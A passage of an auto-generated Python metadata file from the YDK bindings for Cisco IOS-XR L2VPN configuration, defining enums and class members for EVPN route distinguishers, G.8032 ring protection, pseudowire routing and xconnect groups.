}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacNotificationEnum' : _MetaInfoEnum('MacNotificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-notif':'no_notif',
'syslog':'syslog',
'trap':'trap',
'syslog-snmp':'syslog_snmp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnVerificationEnum' : _MetaInfoEnum('L2VpnVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LdpVplsIdEnum' : _MetaInfoEnum('LdpVplsIdEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'two-byte-as':'two_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLearnEnum' : _MetaInfoEnum('MacLearnEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'default-learning':'default_learning',
'enable-learning':'enable_learning',
'disable-learning':'disable_learning',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PortDownFlushEnum' : _MetaInfoEnum('PortDownFlushEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port-down-flush':'port_down_flush',
'enable-port-down-flush':'enable_port_down_flush',
'disable-port-down-flush':'disable_port_down_flush',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnCapabilityModeEnum' : _MetaInfoEnum('L2VpnCapabilityModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'high-mode':'high_mode',
'single-mode':'single_mode',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSignalingProtocolEnum' : _MetaInfoEnum('MplsSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'ldp':'ldp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetEnum' : _MetaInfoEnum('BgpRouteTargetEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-stitching':'no_stitching',
'stitching':'stitching',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ControlWordEnum' : _MetaInfoEnum('ControlWordEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PreferredPathEnum' : _MetaInfoEnum('PreferredPathEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'te-tunnel':'te_tunnel',
'ip-tunnel':'ip_tunnel',
'tp-tunnel':'tp_tunnel',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BridgeDomainTransportModeEnum' : _MetaInfoEnum('BridgeDomainTransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'FlowLabelLoadBalanceEnum' : _MetaInfoEnum('FlowLabelLoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'receive':'receive',
'transmit':'transmit',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteDistinguisherEnum' : _MetaInfoEnum('BgpRouteDistinguisherEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'auto':'auto',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpapsEnum' : _MetaInfoEnum('ErpapsEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'interface':'interface',
'bridge-domain':'bridge_domain',
'xconnect':'xconnect',
'none':'none',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'VccvVerificationEnum' : _MetaInfoEnum('VccvVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'lsp-ping':'lsp_ping',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TransportModeEnum' : _MetaInfoEnum('TransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'vlan':'vlan',
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSequencingEnum' : _MetaInfoEnum('MplsSequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'transmit':'transmit',
'receive':'receive',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacSecureActionEnum' : _MetaInfoEnum('MacSecureActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'restrict':'restrict',
'none':'none',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Two byte or 4 byte AS number
''',
'as_',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('as-index', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' AS:nn (hex or decimal format)
''',
'as_index',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BgpRouteDistinguisherEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteDistinguisherEnum',
[], [],
''' Router Distinguisher Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-route-distinguisher',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting.PwRoutingBgp' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting.PwRoutingBgp',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-route-distinguisher', REFERENCE_CLASS, 'EvpnRouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'evpn_route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing-bgp',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.PwRouting' : {
'meta_info' : _MetaInfoClass('L2Vpn.PwRouting',
False,
[
_MetaInfoClassMember('pw-routing-bgp', REFERENCE_CLASS, 'PwRoutingBgp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.PwRouting.PwRoutingBgp',
[], [],
''' Enable Autodiscovery BGP Pseudowire-routing BGP
''',
'pw_routing_bgp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-routing-global-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire-routing Global ID
''',
'pw_routing_global_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pw-routing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Neighbor' : {
'meta_info' : _MetaInfoClass('L2Vpn.Neighbor',
False,
[
_MetaInfoClassMember('ldp-flap', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable targetted LDP session flap action
''',
'ldp_flap',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'neighbor',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port0 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port0 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
False,
[
_MetaInfoClassMember('erp-port0', REFERENCE_LIST, 'ErpPort0' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0',
[], [],
''' Configure ERP main port0
''',
'erp_port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port0s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
False,
[
_MetaInfoClassMember('port', REFERENCE_ENUM_CLASS, 'ErpPort1Enum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPort1Enum',
[], [],
''' ERP main port number
''',
'port',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'RplRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'RplRoleEnum',
[], [],
''' RPL role
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'rpl',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
False,
[
_MetaInfoClassMember('aps-channel', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port1 APS channel in the format of
InterfaceName, BDName or XconnectName
''',
'aps_channel',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('aps-type', REFERENCE_ENUM_CLASS, 'ErpapsEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpapsEnum',
[], [],
''' Port1 APS type
''',
'aps_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable automatic protection switching
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('level', ATTRIBUTE, 'int' , None, None,
[('0', '7')], [],
''' Automatic protection switching level
''',
'level',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port0', ATTRIBUTE, 'str' , None, None,
[], [],
''' Port0 APS channel in the format of
InterfaceName
''',
'port0',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('port1', REFERENCE_CLASS, 'Port1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1',
[], [],
''' APS channel for ERP port1
''',
'port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'aps',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
False,
[
_MetaInfoClassMember('erp-instance-id', ATTRIBUTE, 'int' , None, None,
[('1', '2')], [],
''' ERP instance number
''',
'erp_instance_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('aps', REFERENCE_CLASS, 'Aps' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps',
[], [],
''' Automatic protection switching
''',
'aps',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('description', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance
description
''',
'description',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('inclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Associates a set of VLAN IDs with the G
.8032 instance
''',
'inclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Ethernet ring protection instance profile
''',
'profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('rpl', REFERENCE_CLASS, 'Rpl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl',
[], [],
''' Ring protection link
''',
'rpl',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
False,
[
_MetaInfoClassMember('erp-instance', REFERENCE_LIST, 'ErpInstance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance',
[], [],
''' Ethernet ring protection instance
''',
'erp_instance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-instances',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
False,
[
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'none',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port1 interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('monitor', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Ethernet ring protection port1 monitor
''',
'monitor',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'virtual-or-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
False,
[
_MetaInfoClassMember('erp-port-type', REFERENCE_ENUM_CLASS, 'ErpPortEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ErpPortEnum',
[], [],
''' Port1 type
''',
'erp_port_type',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('none', REFERENCE_CLASS, 'None_' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_',
[], [],
''' none
''',
'none',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('virtual-or-interface', REFERENCE_LIST, 'VirtualOrInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface',
[], [],
''' virtual or interface
''',
'virtual_or_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
False,
[
_MetaInfoClassMember('erp-port1', REFERENCE_LIST, 'ErpPort1' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1',
[], [],
''' Ethernet ring protection port1
''',
'erp_port1',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'erp-port1s',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings.G8032Ring' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings.G8032Ring',
False,
[
_MetaInfoClassMember('g8032-ring-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the G8032 ring
''',
'g8032_ring_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('erp-instances', REFERENCE_CLASS, 'ErpInstances' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances',
[], [],
''' List of ethernet ring protection instance
''',
'erp_instances',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port0s', REFERENCE_CLASS, 'ErpPort0S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port0s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-port1s', REFERENCE_CLASS, 'ErpPort1S' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S',
[], [],
''' Ethernet ring protection port0
''',
'erp_port1s',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('erp-provider-bridge', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Ethernet ring protection provider bridge
''',
'erp_provider_bridge',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('exclusion-list', ATTRIBUTE, 'str' , None, None,
[], [],
''' Vlan IDs in the format of a-b,c,d,e-f,g
,untagged
''',
'exclusion_list',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('open-ring', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Specify the G.8032 instance as open ring
''',
'open_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-ring',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.G8032Rings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.G8032Rings',
False,
[
_MetaInfoClassMember('g8032-ring', REFERENCE_LIST, 'G8032Ring' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.G8032Rings.G8032Ring',
[], [],
''' G8032 Ring
''',
'g8032_ring',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'g8032-rings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
False,
[
_MetaInfoClassMember('interface-name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'interface_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits',
False,
[
_MetaInfoClassMember('backup-attachment-circuit', REFERENCE_LIST, 'BackupAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit',
[], [],
''' Backup attachment circuit
''',
'backup_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Remote AC ID
''',
'remote_acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('source-acid', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' Source AC ID
''',
'source_acid',
